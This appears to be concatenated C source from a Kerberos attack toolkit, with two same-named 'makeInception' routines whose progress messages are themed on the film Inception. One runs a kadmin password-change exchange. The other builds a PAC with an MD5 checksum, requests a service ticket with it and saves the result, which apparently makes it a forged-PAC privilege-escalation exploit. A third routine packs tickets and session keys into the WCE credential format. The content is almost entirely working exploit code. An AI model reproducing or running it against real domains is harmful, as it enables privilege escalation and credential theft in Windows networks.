void makeInception(PCSTR user, PCSTR domain, PCSTR newpassword, EncryptionKey *key, PCSTR kdc, WORD port, WORD kadminPort) { SOCKET connectSocket, connectSocketAdmin; OssBuf AsReq, ApReq, KrbPrivReq; KDC_REP *AsRep; AP_REP *ApRep; KRB_PRIV *KrbPriv; EncKDCRepPart *encAsRepPart; _octet1 password; EncryptionKey authKey; UInt32 seq; EncKrbPrivPart *encKrbPrivPart; password.length = strlen(newpassword); password.value = (unsigned char *) newpassword; if(kull_m_sock_initSocket(kdc, port, &connectSocket)) { kprintf(" [level 1] Reality (AS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, "kadmin", "changepw", NULL, FALSE, NULL, NULL, &AsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU)) { kprintf(" [level 2] Van Chase (AP-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_ApReq(&ApReq, user, domain, &AsRep->ticket, &encAsRepPart->key, KRB_KEY_USAGE_AP_REQ_AUTHENTICATOR, &authKey, &seq)) { kprintf(" [level 3] The Hotel (KRB-PRIV - REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KrbPriv(&password, &authKey, "wtf", &KrbPrivReq, &seq)) { if(kull_m_sock_initSocket(kdc, kadminPort, &connectSocketAdmin)) { if(kull_m_kerberos_helper_net_callKadminOssBuf(&connectSocketAdmin, &ApReq, &KrbPrivReq, &ApRep, &KrbPriv)) { kprintf(" [level 4] Snow Fortress (KRB-PRIV - REP)\n"); if(kull_m_kerberos_asn1_helper_build_EncKrbPrivPart_from_Priv(KrbPriv, &encKrbPrivPart, &authKey)) { kprintf(" [level 5] Limbo ! : "); retFromKadmin(&encKrbPrivPart->user_data); kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbPrivPart_PDU, encKrbPrivPart); } kull_m_kerberos_asn1_helper_ossFreePDU(KRB_PRIV_PDU, KrbPriv); kull_m_kerberos_asn1_helper_ossFreePDU(AP_REP_PDU, ApRep); } kull_m_sock_termSocket(&connectSocketAdmin); } kull_m_kerberos_asn1_helper_ossFreeBuf(KrbPrivReq.value); } kull_m_kerberos_asn1_helper_ossFreeBuf(ApReq.value); } kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value); } kull_m_sock_termSocket(&connectSocket); } }
BOOL kiwi_krbcred_write(KRB_CRED *cred, OssBuf *output) { BOOL status = FALSE; OssBuf tmp = {0, NULL}; output->length = 0; output->value = NULL; if(!kull_m_kerberos_asn1_helper_ossEncode(KRB_CRED_PDU, cred, &tmp)) { if(output->value = (unsigned char *) LocalAlloc(LPTR, tmp.length)) { RtlCopyMemory(output->value, tmp.value, tmp.length); output->length = tmp.length; status = TRUE; } kull_m_kerberos_asn1_helper_ossFreeBuf(tmp.value); } else PRINT_ERROR("%s", kull_m_kerberos_asn1_helper_ossGetErrMsg()); if(!status && output->value) { output->length = 0; LocalFree(output->value); } return status; }
void makeInception(PCSTR user, PCSTR domain, PSID sid, DWORD rid, PCSTR target, PCSTR service, EncryptionKey *key, PCSTR kdc, WORD port, PCSTR filename) { SOCKET connectSocket; OssBuf AsReq, TgsReq; KDC_REP *AsRep, *TgsRep; EncKDCRepPart *encAsRepPart, *encTgsRepPart; _octet1 pac; if(kull_m_sock_initSocket(kdc, port, &connectSocket)) { kprintf(" [level 1] Reality (AS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, key, NULL, NULL, FALSE, NULL, NULL, &AsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &AsReq, (LPVOID *) &AsRep, AS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(AsRep, &encAsRepPart, key, EncASRepPart_PDU)) { kprintf(" [level 2] Van Chase (PAC TIME)\n"); if(giveMePac(user, sid, rid, &encAsRepPart->authtime, KERB_CHECKSUM_MD5, NULL, &pac)) { kprintf(" [level 3] The Hotel (TGS-REQ)\n"); if(kull_m_kerberos_asn1_helper_build_KdcReq(user, domain, &encAsRepPart->key, service, target, FALSE, &AsRep->ticket, &pac, &TgsReq)) { if(kull_m_kerberos_helper_net_callKdcOssBuf(&connectSocket, &TgsReq, (LPVOID *) &TgsRep, TGS_REP_PDU)) { if(kull_m_kerberos_asn1_helper_build_EncKDCRepPart_from_Rep(TgsRep, &encTgsRepPart, &encAsRepPart->key, EncTGSRepPart_PDU)) { kprintf(" [level 4-5] Limbo (KRB-CRED)\n"); kull_m_kerberos_helper_util_SaveRepAsKrbCred(TgsRep, encTgsRepPart, filename); kull_m_kerberos_asn1_helper_ossFreePDU(EncTGSRepPart_PDU, encTgsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(TGS_REP_PDU, TgsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(TgsReq.value); } LocalFree(pac.value); } kull_m_kerberos_asn1_helper_ossFreePDU(EncASRepPart_PDU, encAsRepPart); } kull_m_kerberos_asn1_helper_ossFreePDU(AS_REP_PDU, AsRep); } kull_m_kerberos_asn1_helper_ossFreeBuf(AsReq.value); } kull_m_sock_termSocket(&connectSocket); } }
BOOL kiwi_wce_write(KRB_CRED *cred, OssBuf *output) { BOOL status = FALSE; PWCE_BUFF_TICKET outputTmp = NULL; EncKrbCredPart * encKrbCredPart = NULL, credpart; struct _seqof5 * nextInfos, infos; struct _seqof3 * nextTicket, ticket; KRB_CRED tmp; DWORD i, count = 0; PWCE_KERBEROS_TICKET pWce; output->length = 0; output->value = NULL; if(!kull_m_kerberos_asn1_helper_ossDecode(EncKrbCredPart_PDU, (OssBuf *) &cred->enc_part.cipher, (LPVOID *) &encKrbCredPart)) { status = TRUE; for(nextTicket = cred->tickets, nextInfos = encKrbCredPart->ticket_info; nextTicket && nextInfos && status; nextTicket = nextTicket->next, nextInfos = nextInfos->next) count++; if(count && (outputTmp = (PWCE_BUFF_TICKET) LocalAlloc(LPTR, count * sizeof(WCE_BUFF_TICKET)))) { for(nextTicket = cred->tickets, nextInfos = encKrbCredPart->ticket_info, i = 0; nextTicket && nextInfos && status; nextTicket = nextTicket->next, nextInfos = nextInfos->next, i++) { tmp.pvno = 5; tmp.msg_type = 22; tmp.enc_part.bit_mask = 0; tmp.enc_part.etype = KERB_ETYPE_NULL; tmp.enc_part.cipher.length = 0; tmp.enc_part.cipher.value = NULL; tmp.tickets = &ticket; credpart.bit_mask = 0; credpart.ticket_info = &infos; ticket = *nextTicket; ticket.next = NULL; infos = *nextInfos; infos.next = NULL; outputTmp[i].SessionKey.length = infos.value.key.keyvalue.length; if(outputTmp[i].SessionKey.length && (outputTmp[i].SessionKey.value = (PBYTE) LocalAlloc(LPTR, outputTmp[i].SessionKey.length))) { RtlCopyMemory(outputTmp[i].SessionKey.value, infos.value.key.keyvalue.value, outputTmp[i].SessionKey.length); if(!kull_m_kerberos_asn1_helper_ossEncode(EncKrbCredPart_PDU, &credpart, (OssBuf *) &tmp.enc_part.cipher)) { if(!kiwi_krbcred_write(&tmp, &outputTmp[i].Ticket)) PRINT_ERROR("writing KRB_CRED\n"); kull_m_kerberos_asn1_helper_ossFreeBuf(tmp.enc_part.cipher.value); } else PRINT_ERROR("%s", kull_m_kerberos_asn1_helper_ossGetErrMsg()); } } kull_m_kerberos_asn1_helper_ossFreePDU(EncKrbCredPart_PDU, encKrbCredPart); for(i = 0; i < count; i++) output->length += FIELD_OFFSET(WCE_KERBEROS_TICKET, data) + outputTmp[i].SessionKey.length + outputTmp[i].Ticket.length; output->length += FIELD_OFFSET(WCE_KERBEROS_TICKET, data); if(output->value = (PBYTE) LocalAlloc(LPTR, output->length)) { status = TRUE; for(pWce = (PWCE_KERBEROS_TICKET) output->value, i = 0; i < count; pWce = (PWCE_KERBEROS_TICKET) (pWce->data + pWce->encodedTicketSize + pWce->sessionKeySize), i++) { pWce->header = WCE_KERBEROS_TICKET_HEADER; pWce->sessionKeySize = outputTmp[i].SessionKey.length; pWce->encodedTicketSize = outputTmp[i].Ticket.length; if(outputTmp[i].SessionKey.length && outputTmp[i].SessionKey.value) { RtlCopyMemory(pWce->data, outputTmp[i].SessionKey.value, pWce->sessionKeySize); LocalFree(outputTmp[i].SessionKey.value); } if(outputTmp[i].Ticket.length && outputTmp[i].Ticket.value) { RtlCopyMemory(pWce->data + pWce->sessionKeySize, outputTmp[i].Ticket.value, pWce->encodedTicketSize); LocalFree(outputTmp[i].Ticket.value); } } pWce->header = WCE_KERBEROS_TICKET_HEADER; pWce->sessionKeySize = 0; pWce->encodedTicketSize = 0; } } else PRINT_ERROR("%s\n", kull_m_kerberos_asn1_helper_ossGetErrMsg()); } if(!status && output->value) LocalFree(output->value); return status; }